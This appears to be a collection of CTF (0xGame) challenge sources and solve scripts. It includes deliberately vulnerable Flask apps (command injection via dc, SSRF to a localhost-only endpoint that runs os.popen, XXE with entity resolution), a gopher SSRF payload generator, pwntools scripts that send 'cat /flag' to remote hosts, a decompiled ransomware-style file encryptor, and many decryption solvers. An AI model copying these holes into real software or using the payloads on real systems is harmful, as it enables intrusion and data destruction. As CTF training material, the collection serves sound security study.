from flask import Flask, request
import subprocess

app = Flask(__name__)


@app.route("/")
def index():
    return open(__file__).read()


@app.route("/calc", methods=['POST'])
def calculator():
    expression = request.form.get('expression') or "114 1000 * 514 + p"
    result = subprocess.run(["dc", "-e", expression], capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    app.run(host="0.0.0.0", port=8000)

flag=""
cipher=[
  0x7E, 0x35, 0x0B, 0x2A, 0x27, 0x2C, 0x33, 0x1F, 0x76, 0x37, 
  0x1B, 0x72, 0x31, 0x1E, 0x36, 0x0C, 0x4C, 0x44, 0x63, 0x72, 
  0x57, 0x49, 0x08, 0x45, 0x42, 0x01, 0x5A, 0x04, 0x13, 0x4C
]
for i in range(30):
    flag+=chr(cipher[i]^(78-i))
print(flag)

from pwn import *
p = remote("47.97.58.52",40010)
# print(p.recvuntil(b'='))
for i in range(0,100):
    ques=p.recvuntil(b' =')
    print(bytes.decode(ques))
    express=re.search(r'=(\d.*?)=',bytes.decode(ques).replace(' ','').replace('\n','')).group(1)
    express = express.replace('\n', '')  # 将 ÷ 替换为 /
    print(express)
    value=int(eval(express))
    print(value)
    p.sendline(str(value).encode())
    print("第",i)
p.recvuntil(b'shell!')
p.sendline("cat /flag".encode())
p.interactive()

import base64
from pwn import *
p = remote("47.98.178.117",1111)
def manbo_decode(cipher):
    manbo_dict = {"曼波":"0","哦耶":"1","哇嗷":"2"}
    manbo_text = ""
    for i in range(0,len(cipher),2):
        manbo_text += manbo_dict[cipher[i:i+2]]
    return manbo_text

def base3_decode(s):
    base3_plain = ""
    base3_cipher=[]
    for i in range(0,len(s),5):
        base3_cipher.append(s[i:i+5])
    for i in range(len(base3_cipher)):
        cipher=base3_cipher[i]
        plain=0
        for i in range(len(cipher)):
            plain += int(cipher[i])*3**(4-i)
        base3_plain += chr(plain)
    return base3_plain
def RC4_decrypt(cipher, K):
    # 对密文进行 Base64 解码
    cipher = base64.b64decode(cipher).decode()

    # 初始化 S 和 T
    S = [0] * 256
    T = [0] * 256
    for i in range(256):
        S[i] = i
        T[i] = K[i % len(K)]

    # 使用密钥 K 打乱 S 数组
    j = 0
    for i in range(256):
        j = (j + S[i] + ord(T[i])) % 256
        S[i], S[j] = S[j], S[i]

    # 生成密钥流并解密密文
    i = 0
    j = 0
    plain = []
    for c in cipher:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        t = (S[i] + S[j]) % 256
        k = S[t]
        plain.append(chr(ord(c) ^ k))

    return "".join(plain)
ques=p.recvuntil(b'>')
flag=""
while(1):
    try:
        p.sendline(b'1')
        ques=p.recvuntil(b'>')
        p.sendline(b'2')
        ques=p.recvuntil(b'>')
        key=re.search(r'(\d.*?)P',bytes.decode(ques).replace(' ','').replace('\n','')).group(1)
        p.sendline(b'3')
        ques=p.recvuntil(b'>')
        cipher=re.search(r'(.*?)P',bytes.decode(ques).replace(' ','').replace('\n','')).group(1)
        a=manbo_decode(cipher)
        b=base3_decode(a)
        c=RC4_decrypt(b,key)
        flag += c
        print(flag)
    except:
        exit(0)

from typing import Literal

def tupper_self_referential_formula(k: int, width: int = 17, height: int = 106):
    """
    Tupper self referential formula函数

    Parameters:
        k - 用于迭代图像的k值
        width - 图像的宽
        height - 图像的高
    
    Returns:
        类型是numpy.ndarray矩阵，里面只有0和1
    """
    import numpy as np
    rst = np.zeros((width, height))
    def f(x: int, y: int) -> int:
        y += k
        a1 = 2 ** (width * x + y % width)
        a2 = (y // width) // a1
        return 1 if (a2 & 1) == 1 else 0
    
    for y in range(width):
        for x in range(height):
            rst[y, x] = f(x, y)
    
    return rst[:, ::-1]

def tupper_to_str(k: int, width: int = 17, height: int = 106, show_black: str = "■", show_white: str = "□") -> str:
    """
    生成Tupper self referential formula函数的字符画

    Parameters:
        k - 用于迭代图像的k值
        width - 图像的宽
        height - 图像的高
        show_black - 字符画中的黑色方块
        show_white - 字符画中的白色方块
    
    Returns:
        字符画字符串
    """
    mat = tupper_self_referential_formula(k, width, height)
    rst = ''
    for y in range(width):
        for x in range(height):
            if mat[y, x] == 1:
                rst += show_black
            else:
                rst += show_white
        rst += '\n'
    return rst

def tupper_to_img(k: int, width: int = 17, height: int = 106, filename: str = 'tupper.png', origin: Literal['upper', 'lower'] = 'upper'):
    """
    生成Tupper self referential formula函数的字符画

    Parameters:
        k - 用于迭代图像的k值
        width - 图像的宽
        height - 图像的高
        filename - 输出图像的文件名
        origin - 输出图像的方式(upper或者lower)
    
    Returns:
        类型是numpy.ndarray矩阵，里面只有0和1
    """
    import matplotlib.pyplot as plt
    rst = tupper_self_referential_formula(k, width, height)
    plt.figure(figsize=(15, 10))
    plt.imshow(rst, origin=origin)
    plt.savefig(filename)
    
    return rst


k = 9489414856877039590479997730148554425666925984049232945604842888420596111937489062065081199094002132087091572191187170308560128611026043144427876131133135794969867759108490917632153891963456295991713868378392769549376070709924497237322046334486274987407067993824142187115870972520417207510521083293280152434558803258138899515603807505064799735152359900010019631133734298562293682916239050320580346316026460860919542540955914826806059123630945216006606268974979135253968165822806241305783300650874506602000048154282039485531804337171305656252
rst = tupper_to_str(k, 17, 106)
print(rst)
tupper_to_img(k, 17, 106)

from flask import Flask, request
import os
from urllib.parse import urlparse, urlunparse
import subprocess
import socket

app = Flask(__name__)
BlackList=[
    "127.0.0.1"
]

@app.route('/')
def index():
    return open(__file__).read()


@app.route('/cmd',methods=['POST'])
def cmd():
    if request.remote_addr != "127.0.0.1":
        return "Forbidden"
    if request.method == "GET":
        return "Hello World!"
    if request.method == "POST":
        return os.popen(request.form.get("cmd")).read()


@app.route('/visit')
def visit():
    url = request.args.get('url')
    if url is None:
        return "No url provided"
    url = urlparse(url)
    realIpAddress = socket.gethostbyname(url.hostname)
    if url.scheme == "file" or realIpAddress in BlackList:
        return "Hacker!"
    result = subprocess.run(["curl","-L", urlunparse(url)], capture_output=True, text=True)
    # print(result.stderr)
    return result.stdout


if __name__ == '__main__':
    app.run(host='0.0.0.0',port=8000)

import urllib.parse

host = "0.0.0.0:8000"
content = "cmd=env"
content_length = len(content)

test ="""POST /cmd HTTP/1.1
Host: {}
Content-Type: application/x-www-form-urlencoded
Content-Length: {}

{}
""".format(host,content_length,content)

tmp = urllib.parse.quote(test)
new = tmp.replace("%0A","%0D%0A")
result = urllib.parse.quote(new)
print("gopher://"+host+"/_"+result)

from flask import Flask,request
import base64
from lxml import etree
app = Flask(__name__)

@app.route('/')
def index():
    return open(__file__).read()


@app.route('/parse',methods=['POST'])
def parse():
    xml=request.form.get('xml')
    print(xml)
    if xml is None:
        return "None"
    parser = etree.XMLParser(load_dtd=True, resolve_entities=True)
    root = etree.fromstring(xml, parser)
    name=root.find('name').text
    return name or None



if __name__=="__main__":
    app.run(host='0.0.0.0',port=8000)

cipher=[0x03, 0x87, 0x74, 0x16, 0xD6, 0x56, 0xB7, 0x63, 0x83, 0x46, 
  0x66, 0x66, 0x43, 0x53, 0x83, 0xD2, 0x23, 0x93, 0x56, 0x53, 
  0xD2, 0x43, 0x36, 0x36, 0x03, 0xD2, 0x16, 0x93, 0x36, 0x26, 
  0xD2, 0x93, 0x73, 0x13, 0x66, 0x56, 0x36, 0x33, 0x33, 0x83, 
  0x56, 0x23, 0x66, 0xD7]
flag=""
for i in range(len(cipher)):
    flag += chr(((16 * cipher[i]) | (cipher[i] >> 4))&0x00ff)

print(flag)

Alphabat = "0123456789abcdef"
cipher="ab50e920-4a97-70d1-b646-cdac5c873376"
flag=""
for i in range(len(cipher)):
    if cipher[i] in Alphabat:
        for index in range(16):
            if cipher[i]==Alphabat[((index * 5) + 3) % 16]:
                flag += Alphabat[index]
                break
    else:
        flag += cipher[i]
flag = "0xGame{" + flag +"}"
print(flag)
#0xGame{b8a9fe39-dbe4-4926-87d7-52b5a5140047}

cipher=[ 0x0C, 0x4F, 0x10, 0x1F, 0x4E, 0x16, 0x21, 0x12, 0x4B, 0x24, 
  0x10, 0x4B, 0x0A, 0x24, 0x1F, 0x17, 0x09, 0x4F, 0x07, 0x08, 
  0x21, 0x5C, 0x2C, 0x1A, 0x10, 0x1F, 0x11, 0x16, 0x59, 0x5A]
str=""
for i in range(len(cipher)):
    if i % 2==0:
        str += chr(cipher[i]^0x7e)
    else:
        str += chr(cipher[i]^0x7b)
print("0xGame{"+str+"}")

from z3 import *
from libnum import *
import gmpy2
# 创建 Z3 变量
v11 = BitVec('v11', 64)
v12 = BitVec('v12', 64)
v10 = BitVec('v10', 64)

# 定义表达式
expr = 11 * v11 + 14 * v10 - v12
exper1 = 9 * v10 - 3 * v11 + 4 * v12
exper2 = ((v12 - v11) >> 1) + (v10 ^ BitVecVal(0x87654321, 64))


target = BitVecVal(0x48FB41DDD, 64)
target1 = BitVecVal(0x2BA692AD7, 64)
target2 = BitVecVal(0xCDBDFAAC, 64)

# 创建求解器
solver = Solver()
# 添加约束（等式）
solver.add(expr == target,
            exper1 == target1,
           exper2 == target2,
           )
# 检查是否有解
flag = ""
if solver.check() == sat:
    model = solver.model()
    v11_val = int(model[v11].as_long())
    v12_val = int(model[v12].as_long())
    v10_val = int(model[v10].as_long())
    print(f'v11 = {v11_val}')
    print(f'v12 = {v12_val}')
    print(f'v13 = {v10_val}')
    flag += "0xGame{e544267d"+"-"+n2s(v10_val).decode()[::-1]+"-"+n2s(v11_val).decode()[::-1]+"-"+n2s(v12_val).decode()[::-1]+"-"+"d085a85201a4}"
    

else:
    print("No solution found.")

print(flag)
#9c0525dcbadf4cbd9715067159453e74

cipher=[20,92,43,69,81,73,95,23,72,22,24,69,25,27,22,17,23,29,24,73,17,24,85,27,112,76,15,92,24,1,73,84,13,81,12,0,84,73,82,8,82,81,76,125]
flag=""
for i in range(0,22):
    cipher[i] = cipher[i] + 28
    flag += chr(cipher[i])

for i in range(22,len(cipher)-1):
    cipher[i] = cipher[i] ^ cipher[i-22]
    flag += chr(cipher[i])
flag += chr(cipher[43])
print(flag)

from libnum import *
import numpy
cipher=[316224,671996,854156,384156,296824,939587,681579,343618]
for i in range(0,8):
    print(str(hex(cipher[i])).replace('0x',''),end='')
#0xGame{4d340a40fcd088c5dc9c48778e5643a666b53e42}

//cipher=[0x85336dd3,0x2a7a7c3b,0x64306238,0x36396434,0x62336364,0x38376533,0x37323664,0x33363463,0xf8ee8ea2,c9b65cce]
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
 

 
 
 
void decrypt(uint32_t* v, uint32_t* k)
{
    uint32_t delta = -1640531527;
    uint32_t v0 = v[0], v1 = v[1], sum = (delta * 32) & 0xffffffff, i;
    uint32_t k0 = k[0], k1 = k[1], k2 = k[2], k3 = k[3];
    for (i = 0; i < 32; i++)
    {
        v1 -= ((v0 << 4) + k2) ^ (v0 + sum) ^ ((v0 >> 5) + k3) ;
        v0 -= ((v1 << 4) + k0) ^ (v1 + sum) ^ ((v1 >> 5) + k1) ;
        sum -= delta;
    }
    v[0] = v0; v[1] = v1;
}
 
 
int main()
{
    uint32_t array[] = {0x85336dd3,0x2a7a7c3b,0xf8ee8ea2,0xc9b65cce};
    uint32_t key[4] = {0x00000002, 0x00000000, 0x00000002, 0x00000004};
    for (int i = 0; i < 10; i += 2)
    {
        uint32_t temp[2];
        temp[0] = array[i];
        temp[1] = array[i + 1];
        decrypt(temp, key);
        // printf("%x,%x,",temp[0],temp[1]);
        printf("%c%c%c%c%c%c%c%c", *((char*)&temp[0] + 0), *((char*)&temp[0] + 1), *((char*)&temp[0] + 2), *((char*)&temp[0] + 3), *((char*)&temp[1] + 0), *((char*)&temp[1] + 1), *((char*)&temp[1] + 2), *((char*)&temp[1] + 3));
        //更新data
        //0xGame{e8b0d4d96dc3b3e78d627c463c9953a1}
    }
    return 0;
}

# uncompyle6 version 3.9.1
# Python bytecode version base 3.8.0 (3413)
# Decompiled from: Python 3.8.18 (default, Sep 11 2023, 13:39:12) [MSC v.1916 64 bit (AMD64)]
# Embedded file name: summer.py
import os, fnmatch
from Crypto.Cipher import DES3
from Crypto.Util.Padding import pad
from Crypto.Util.number import *
from secret import k3y, readme
import base64

def f(dir=".", ext=['.txt', '.zip', '.7z', '.rar', '.gz', '.png', '.jpg', '.bmp', '.gif', '.mp3', 
 '.wav', '.avi', '.doc', '.docx', '.xls', '.xlsx', '.pdf', '.ppt', '.pptx', 
 '.mp4', '.mov', '.flv', '.mkv', '.swf', '.dll', '.sys', '.iso', '.vmdk', 
 '.vhd', '.vhdx', '.ova']):
    ff = []
    for ro, di, fi in os.walk(dir):
        for ex in ext:
            for na in fnmatch.filter(fi, "*" + ex):
                fp = os.path.join(ro, na)
                ff.append(fp)

        else:
            return ff


def encrypt1(key, plaintext):
    padded_plaintext = pad(plaintext, DES3.block_size)
    ciphertext = cipher.encrypt(padded_plaintext)
    return ciphertext


def encrypt2(m):
    p = getPrime(256)
    q = getPrime(256)
    n = p * q
    e = 65537
    m1 = bytes_to_long(m)
    c = pow(m1, e, n)
    return (n, c)


def release(txt, m):
    with open("Oops!.txt", "w") as f:
        f.write(txt + "\n\n\n")
        f.write(base64.b64encode((str(m[0].bit_length()) + str(m[0]) + str(m[1].bit_length()) + str(m[1])).encode()).decode())


if __name__ == "__main__":
    fl = f()
    for fi in fl:
        with open(fi, "rb") as f:
            data = f.read()
        data = encrypt1(k3y, data)
        with open(fi + ".encrypted", "wb") as f:
            f.write(data)
    else:
        msg = encrypt2(k3y)
        release(readme, msg)

from Crypto.Cipher import DES3
from Crypto.Util.Padding import pad, unpad
from Crypto.Util.number import *
import binascii
def decrypt1(key_hex, ciphertext):
    # 将 48 位 16 进制字符串转换为字节
    key = binascii.unhexlify(key_hex)
    
    # 创建 DES3 解密器
    cipher = DES3.new(key, DES3.MODE_ECB)
    
    # 解密密文
    padded_plaintext = cipher.decrypt(ciphertext)
    
    # 去除填充并返回明文
    plaintext = unpad(padded_plaintext, DES3.block_size)
    return plaintext
with open("Autumn.wav.encrypted", "rb") as f:
    data = f.read()
    data=decrypt1("53756d6d657261ca564a2e226967201869baecc5949f7cb5",data)
    with open("flag.wav","wb") as f1:
        f1.write(data)

true_key="This is: True_KEY!for #0xgAmE_Unity~Cryption"
key="0xoX0XOxOXoxGAME"
cipher=[0x45, 0x21, 0x3e, 0x08, 0x57, 0x31, 0x09, 0x4d, 0x42, 0x45, 0x42, 0x44 ,0x5d, 0x5a, 0x4b, 0x4b, 0x52, 0x56, 0x16, 0x44, 0x66, 0x45, 0x6c, 0x40, 0x57, 0x44, 0x33, 0x35, 0x51, 0x75, 0x0d, 0x58, 0x15, 0x71, 0x11, 0x1b, 0x0b, 0x08, 0x76, 0x04, 0x4f, 0x5c, 0x68, 0x3c]
print(len(cipher))
true_key_1=[]
for i in range(len(true_key)):
    true_key_1.append(true_key[i])
num=0
for i in range(0,44):
    num = (num + ord(key[i%len(key)])) % 44
    temp = true_key_1[num]
    true_key_1[num] = true_key_1[i]
    true_key_1[i] = temp
flag = ""
for i in range(43,-1,-1):
    flag += chr(cipher[i] ^ ord(true_key_1[i]))
print(flag[::-1])
#0xGame{36ecd059-b3e7-73c8-fa80-0a2abef3c757}

"""
PyInstaller Extractor NG v1.0 (Supports pyinstaller 5.10.1, 5.10.0, 5.9.0, 5.8.0, 5.7.0, 5.6.2, 5.6.1, 5.6, 5.5, 5.4.1, 5.4, 5.3, 5.2, 5.1, 5.0.1, 5.0, 4.10, 4.9, 4.8, 4.7, 4.6, 4.5.1, 4.5, 4.4, 4.3, 4.2, 4.1, 4.0, 3.6, 3.5, 3.4, 3.3, 3.2, 3.1, 3.0, 2.1, 2.0)
Author : Extreme Coders
E-mail : extremecoders(at)hotmail(dot)com
Web    : https://0xec.blogspot.com
Url    : https://github.com/pyinstxtractor/pyinstxtractor-ng

This script extracts a pyinstaller generated executable file.
Uses the xdis library to unmarshal code objects, hence you should
be able to decompile an executable from any Python version without
being restricted to use the same version of Python for running the
script as well.

Licensed under GNU General Public License (GPL) v3.
"""

import os
import sys
import zlib
import struct
import argparse

from uuid import uuid4 as uniquename

from Crypto.Cipher import AES
from Crypto.Util import Counter

from xdis.unmarshal import load_code

def eprint(*args, **kwargs):
    print(*args, file=sys.stderr, **kwargs)

def pycHeader2Magic(header):
    header = bytearray(header)
    magicNumber = bytearray(header[:2])
    return magicNumber[1] << 8 | magicNumber[0]


class CTOCEntry:
    def __init__(
        self, position, cmprsdDataSize, uncmprsdDataSize, cmprsFlag, typeCmprsData, name
    ):
        self.position = position
        self.cmprsdDataSize = cmprsdDataSize
        self.uncmprsdDataSize = uncmprsdDataSize
        self.cmprsFlag = cmprsFlag
        self.typeCmprsData = typeCmprsData
        self.name = name


class PyInstArchive:
    PYINST20_COOKIE_SIZE = 24  # For pyinstaller 2.0
    PYINST21_COOKIE_SIZE = 24 + 64  # For pyinstaller 2.1+
    MAGIC = b"MEI\014\013\012\013\016"  # Magic number which identifies pyinstaller

    def __init__(self, path):
        self.filePath = path
        self.pycMagic = b"\0" * 4
        self.barePycList = []  # List of pyc's whose headers have to be fixed
        self.cryptoKey = None
        self.cryptoKeyFileData = None

    def open(self):
        try:
            self.fPtr = open(self.filePath, "rb")
            self.fileSize = os.stat(self.filePath).st_size
        except:
            eprint("[!] Error: Could not open {0}".format(self.filePath))
            return False
        return True

    def close(self):
        try:
            self.fPtr.close()
        except:
            pass

    def checkFile(self):
        print("[+] Processing {0}".format(self.filePath))

        searchChunkSize = 8192
        endPos = self.fileSize
        self.cookiePos = -1

        if endPos < len(self.MAGIC):
            eprint("[!] Error: File is too short or truncated")
            return False

        while True:
            startPos = endPos - searchChunkSize if endPos >= searchChunkSize else 0
            chunkSize = endPos - startPos

            if chunkSize < len(self.MAGIC):
                break

            self.fPtr.seek(startPos, os.SEEK_SET)
            data = self.fPtr.read(chunkSize)

            offs = data.rfind(self.MAGIC)

            if offs != -1:
                self.cookiePos = startPos + offs
                break

            endPos = startPos + len(self.MAGIC) - 1

            if startPos == 0:
                break

        if self.cookiePos == -1:
            eprint(
                "[!] Error: Missing cookie, unsupported pyinstaller version or not a pyinstaller archive"
            )
            return False

        self.fPtr.seek(self.cookiePos + self.PYINST20_COOKIE_SIZE, os.SEEK_SET)

        if b"python" in self.fPtr.read(64).lower():
            print("[+] Pyinstaller version: 2.1+")
            self.pyinstVer = 21  # pyinstaller 2.1+
        else:
            self.pyinstVer = 20  # pyinstaller 2.0
            print("[+] Pyinstaller version: 2.0")

        return True

    def getCArchiveInfo(self):
        try:
            if self.pyinstVer == 20:
                self.fPtr.seek(self.cookiePos, os.SEEK_SET)

                # Read CArchive cookie
                (magic, lengthofPackage, toc, tocLen, pyver) = struct.unpack(
                    "!8siiii", self.fPtr.read(self.PYINST20_COOKIE_SIZE)
                )

            elif self.pyinstVer == 21:
                self.fPtr.seek(self.cookiePos, os.SEEK_SET)

                # Read CArchive cookie
                (magic, lengthofPackage, toc, tocLen, pyver, pylibname) = struct.unpack(
                    "!8sIIii64s", self.fPtr.read(self.PYINST21_COOKIE_SIZE)
                )

        except:
            eprint("[!] Error: The file is not a pyinstaller archive")
            return False

        self.pymaj, self.pymin = (
            (pyver // 100, pyver % 100) if pyver >= 100 else (pyver // 10, pyver % 10)
        )
        print("[+] Python version: {0}.{1}".format(self.pymaj, self.pymin))

        # Additional data after the cookie
        tailBytes = (
            self.fileSize
            - self.cookiePos
            - (
                self.PYINST20_COOKIE_SIZE
                if self.pyinstVer == 20
                else self.PYINST21_COOKIE_SIZE
            )
        )

        # Overlay is the data appended at the end of the PE
        self.overlaySize = lengthofPackage + tailBytes
        self.overlayPos = self.fileSize - self.overlaySize
        self.tableOfContentsPos = self.overlayPos + toc
        self.tableOfContentsSize = tocLen

        print("[+] Length of package: {0} bytes".format(lengthofPackage))
        return True

    def parseTOC(self):
        # Go to the table of contents
        self.fPtr.seek(self.tableOfContentsPos, os.SEEK_SET)

        self.tocList = []
        parsedLen = 0

        # Parse table of contents
        while parsedLen < self.tableOfContentsSize:
            (entrySize,) = struct.unpack("!i", self.fPtr.read(4))
            nameLen = struct.calcsize("!iIIIBc")

            (
                entryPos,
                cmprsdDataSize,
                uncmprsdDataSize,
                cmprsFlag,
                typeCmprsData,
                name,
            ) = struct.unpack(
                "!IIIBc{0}s".format(entrySize - nameLen), self.fPtr.read(entrySize - 4)
            )

            try:
                name = name.decode("utf-8").rstrip("\0")
            except UnicodeDecodeError:
                newName = str(uniquename())
                print('[!] Warning: File name {0} contains invalid bytes. Using random name {1}'.format(name, newName))
                name = newName

            # Prevent writing outside the extraction directory
            if name.startswith("/"):
                name = name.lstrip("/")

            if len(name) == 0:
                name = str(uniquename())
                print(
                    "[!] Warning: Found an unamed file in CArchive. Using random name {0}".format(
                        name
                    )
                )

            self.tocList.append(
                CTOCEntry(
                    self.overlayPos + entryPos,
                    cmprsdDataSize,
                    uncmprsdDataSize,
                    cmprsFlag,
                    typeCmprsData,
                    name,
                )
            )

            parsedLen += entrySize
        print("[+] Found {0} files in CArchive".format(len(self.tocList)))

    def _writeRawData(self, filepath, data):
        nm = (
            filepath.replace("\\", os.path.sep)
            .replace("/", os.path.sep)
            .replace("..", "__")
        )
        nmDir = os.path.dirname(nm)
        if nmDir != "" and not os.path.exists(
            nmDir
        ):  # Check if path exists, create if not
            os.makedirs(nmDir)

        with open(nm, "wb") as f:
            f.write(data)

    def extractFiles(self, one_dir):
        print("[+] Beginning extraction...please standby")
        extractionDir = os.path.join(
            os.getcwd(), os.path.basename(self.filePath) + "_extracted"
        )

        if not os.path.exists(extractionDir):
            os.mkdir(extractionDir)

        os.chdir(extractionDir)

        for entry in self.tocList:
            self.fPtr.seek(entry.position, os.SEEK_SET)
            data = self.fPtr.read(entry.cmprsdDataSize)

            if entry.cmprsFlag == 1:
                data = zlib.decompress(data)
                # Malware may tamper with the uncompressed size
                # Comment out the assertion in such a case
                assert len(data) == entry.uncmprsdDataSize  # Sanity Check

            if entry.typeCmprsData == b"d" or entry.typeCmprsData == b"o":
                # d -> ARCHIVE_ITEM_DEPENDENCY
                # o -> ARCHIVE_ITEM_RUNTIME_OPTION
                # These are runtime options, not files
                continue

            basePath = os.path.dirname(entry.name)
            if basePath != "":
                # Check if path exists, create if not
                if not os.path.exists(basePath):
                    os.makedirs(basePath)

            if entry.typeCmprsData == b"s":
                # s -> ARCHIVE_ITEM_PYSOURCE
                # Entry point are expected to be python scripts
                print("[+] Possible entry point: {0}.pyc".format(entry.name))

                if self.pycMagic == b"\0" * 4:
                    # if we don't have the pyc header yet, fix them in a later pass
                    self.barePycList.append(entry.name + ".pyc")
                self._writePyc(entry.name + ".pyc", data)

            elif entry.typeCmprsData == b"M" or entry.typeCmprsData == b"m":
                # M -> ARCHIVE_ITEM_PYPACKAGE
                # m -> ARCHIVE_ITEM_PYMODULE
                # packages and modules are pyc files with their header intact

                # From PyInstaller 5.3 and above pyc headers are no longer stored
                # https://github.com/pyinstaller/pyinstaller/commit/a97fdf
                if data[2:4] == b"\r\n":
                    # < pyinstaller 5.3
                    if self.pycMagic == b"\0" * 4:
                        self.pycMagic = data[0:4]
                    self._writeRawData(entry.name + ".pyc", data)

                    if entry.name.endswith("_crypto_key"):
                        print(
                            "[+] Detected _crypto_key file, saving key for automatic decryption"
                        )
                        # This is a pyc file with a header (8,12, or 16 bytes)
                        # Extract the code object after the header
                        self.cryptoKeyFileData = self._extractCryptoKeyObject(data)

                else:
                    # >= pyinstaller 5.3
                    if self.pycMagic == b"\0" * 4:
                        # if we don't have the pyc header yet, fix them in a later pass
                        self.barePycList.append(entry.name + ".pyc")

                    self._writePyc(entry.name + ".pyc", data)

                    if entry.name.endswith("_crypto_key"):
                        print(
                            "[+] Detected _crypto_key file, saving key for automatic decryption"
                        )
                        # This is a plain code object without a header
                        self.cryptoKeyFileData = data

            else:
                self._writeRawData(entry.name, data)

                if entry.typeCmprsData == b"z" or entry.typeCmprsData == b"Z":
                    self._extractPyz(entry.name, one_dir)

        # Fix bare pyc's if any
        self._fixBarePycs()

    def _fixBarePycs(self):
        for pycFile in self.barePycList:
            with open(pycFile, "r+b") as pycFile:
                # Overwrite the first four bytes
                pycFile.write(self.pycMagic)

    def _extractCryptoKeyObject(self, data):
        if self.pymaj >= 3 and self.pymin >= 7:
            # 16 byte header for 3.7 and above
            return data[16:]
        elif self.pymaj >= 3 and self.pymin >= 3:
            # 12 byte header for 3.3-3.6
            return data[12:]
        else:
            # 8 byte header for 2.x, 3.0-3.2
            return data[8:]

    def _writePyc(self, filename, data):
        with open(filename, "wb") as pycFile:
            pycFile.write(self.pycMagic)  # pyc magic

            if self.pymaj >= 3 and self.pymin >= 7:  # PEP 552 -- Deterministic pycs
                pycFile.write(b"\0" * 4)  # Bitfield
                pycFile.write(b"\0" * 8)  # (Timestamp + size) || hash

            else:
                pycFile.write(b"\0" * 4)  # Timestamp
                if self.pymaj >= 3 and self.pymin >= 3:
                    pycFile.write(b"\0" * 4)  # Size parameter added in Python 3.3

            pycFile.write(data)

    def _getCryptoKey(self):
        if self.cryptoKey:
            return self.cryptoKey

        if not self.cryptoKeyFileData:
            return None

        co = load_code(self.cryptoKeyFileData, pycHeader2Magic(self.pycMagic))
        self.cryptoKey = co.co_consts[0]
        return self.cryptoKey

    def _tryDecrypt(self, ct, aes_mode):
        CRYPT_BLOCK_SIZE = 16

        key = bytes(self._getCryptoKey(), "utf-8")
        assert len(key) == 16

        # Initialization vector
        iv = ct[:CRYPT_BLOCK_SIZE]

        if aes_mode == "ctr":
            # Pyinstaller >= 4.0 uses AES in CTR mode
            ctr = Counter.new(128, initial_value=int.from_bytes(iv, byteorder="big"))
            cipher = AES.new(key, AES.MODE_CTR, counter=ctr)
            return cipher.decrypt(ct[CRYPT_BLOCK_SIZE:])

        elif aes_mode == "cfb":
            # Pyinstaller < 4.0 uses AES in CFB mode
            cipher = AES.new(key, AES.MODE_CFB, iv)
            return cipher.decrypt(ct[CRYPT_BLOCK_SIZE:])

    def _extractPyz(self, name, one_dir):
        if one_dir == True:
            dirName = "."
        else:
            dirName = name + "_extracted"
            # Create a directory for the contents of the pyz
            if not os.path.exists(dirName):
                os.mkdir(dirName)

        with open(name, "rb") as f:
            pyzMagic = f.read(4)
            assert pyzMagic == b"PYZ\0"  # Sanity Check

            pyzPycMagic = f.read(4)  # Python magic value

            if self.pycMagic == b"\0" * 4:
                self.pycMagic = pyzPycMagic

            elif self.pycMagic != pyzPycMagic:
                self.pycMagic = pyzPycMagic
                print(
                    "[!] Warning: pyc magic of files inside PYZ archive are different from those in CArchive"
                )

            (tocPosition,) = struct.unpack("!i", f.read(4))
            f.seek(tocPosition, os.SEEK_SET)

            try:
                toc = load_code(f, pycHeader2Magic(pyzPycMagic))
            except:
                print(
                    "[!] Unmarshalling FAILED. Cannot extract {0}. Extracting remaining files.".format(
                        name
                    )
                )
                return

            print("[+] Found {0} files in PYZ archive".format(len(toc)))

            # From pyinstaller 3.1+ toc is a list of tuples
            if type(toc) == list:
                toc = dict(toc)

            for key in toc.keys():
                (ispkg, pos, length) = toc[key]
                f.seek(pos, os.SEEK_SET)
                fileName = key

                try:
                    # for Python > 3.3 some keys are bytes object some are str object
                    fileName = fileName.decode("utf-8")
                except:
                    pass

                # Prevent writing outside dirName
                fileName = fileName.replace("..", "__").replace(".", os.path.sep)

                if ispkg == 1:
                    filePath = os.path.join(dirName, fileName, "__init__.pyc")

                else:
                    filePath = os.path.join(dirName, fileName + ".pyc")

                fileDir = os.path.dirname(filePath)
                if not os.path.exists(fileDir):
                    os.makedirs(fileDir)

                try:
                    data = f.read(length)
                    data = zlib.decompress(data)
                except:
                    try:
                        # Automatic decryption
                        # Make a copy
                        data_copy = data

                        # Try CTR mode, Pyinstaller >= 4.0 uses AES in CTR mode
                        data = self._tryDecrypt(data, "ctr")
                        data = zlib.decompress(data)
                    except:
                        # Try CFB mode, Pyinstaller < 4.0 uses AES in CFB mode
                        try:
                            data = data_copy
                            data = self._tryDecrypt(data, "cfb")
                            data = zlib.decompress(data)
                        except:
                            eprint(
                                "[!] Error: Failed to decrypt & decompress {0}. Extracting as is.".format(
                                    filePath
                                )
                            )
                            open(filePath + ".encrypted", "wb").write(data_copy)
                            continue

                self._writePyc(filePath, data)


def main():
    parser = argparse.ArgumentParser(description="PyInstaller Extractor NG")
    parser.add_argument("filename", help="Path to the file to extract")
    parser.add_argument(
        "-d",
        "--one-dir",
        help="One directory mode, extracts the pyz in the same directory as the executable",
        action="store_true",
    )
    args = parser.parse_args()

    arch = PyInstArchive(args.filename)
    if arch.open():
        if arch.checkFile():
            if arch.getCArchiveInfo():
                arch.parseTOC()
                arch.extractFiles(args.one_dir)
                arch.close()
                print(
                    "[+] Successfully extracted pyinstaller archive: {0}".format(
                        args.filename
                    )
                )
                print("")
                print(
                    "You can now use a python decompiler on the pyc files within the extracted directory"
                )
                sys.exit(0)

        arch.close()
    sys.exit(1)


if __name__ == "__main__":
    main()

File Name: PyPro.py
    Object Name: <module>
    Qualified Name: <module>
    Arg Count: 0
    Pos Only Arg Count: 0
    KW Only Arg Count: 0
    Stack Size: 2
    Flags: 0x00000000
    [Names]
        'base64'
        'Crypto.Cipher'
        'AES'
        'Crypto.Util.number'
        'long_to_bytes'
        'key'
        'PKCS5_pad'
        'main'
        '__name__'
    [Locals+Names]
    [Constants]
        0
        None
        (
            'AES'
        )
        (
            'long_to_bytes'
        )
        0x554B134A029DE539438BD18604BF114
        [Code]
            File Name: PyPro.py
            Object Name: PKCS5_pad
            Qualified Name: PKCS5_pad
            Arg Count: 1
            Pos Only Arg Count: 0
            KW Only Arg Count: 0
            Stack Size: 5
            Flags: 0x00000003 (CO_OPTIMIZED | CO_NEWLOCALS)
            [Names]
                'len'
                'ljust'
                'to_bytes'
            [Locals+Names]
                'data'
                'length'
